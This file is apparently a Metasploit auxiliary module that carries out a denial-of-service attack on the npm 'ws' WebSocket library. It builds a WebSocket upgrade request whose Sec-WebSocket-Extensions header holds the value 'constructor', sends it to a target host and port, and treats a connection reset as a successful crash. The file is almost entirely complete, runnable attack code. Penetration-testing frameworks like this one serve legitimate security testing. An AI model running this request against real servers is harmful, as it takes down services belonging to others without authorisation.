metasploit-framework/modules/auxiliary/dos/http/ws_dos.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize
    super(
      'Name'           => 'ws - Denial of Service',
      'Description'    => %q{
          This module exploits a Denial of Service vulnerability in npm module "ws".
        By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.
      },
      'References'     =>
        [
          ['URL', 'https://nodesecurity.io/advisories/550'],
          ['CWE', '400'],
        ],
      'Author'         =>
        [
          'Ryan Knell,  Sonatype Security Research',
          'Nick Starke, Sonatype Security Research',
        ],
      'License'        =>  MSF_LICENSE
    )

    register_options([
      Opt::RPORT(3000),
      OptString.new('TARGETURI', [true, 'The base path', '/']),
    ],)
  end

  def run
    path = datastore['TARGETURI']

    #Create HTTP request
    req = [
      "GET #{path} HTTP/1.1",
      "Connection: Upgrade",
      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(rand(10) + 5).to_s}",
      "Sec-WebSocket-Version: 8",
      "Sec-WebSocket-Extensions: constructor",  #Adding "constructor" as the value for this header causes the DoS
      "Upgrade: websocket",
      "\r\n"
      ].join("\r\n");

    begin
      connect
      print_status("Sending DoS packet to #{peer}")
      sock.put(req)

      data = sock.get_once(-1)  #Attempt to retrieve data from the socket

      if data =~ /101/   #This is the expected HTTP status code. IF it's present, we have a valid upgrade response.
        print_error("WebSocket Upgrade request Successful, service not vulnerable.")
      else
        fail_with(Failure::Unknown, "An unknown error occured")
      end

      disconnect
      print_error("DoS packet unsuccessful")

    rescue ::Rex::ConnectionRefused
      print_error("Unable to connect to #{peer}")
    rescue ::Errno::ECONNRESET, ::EOFError
      print_good("DoS packet successful. #{peer} not responding.")
    end
  end
end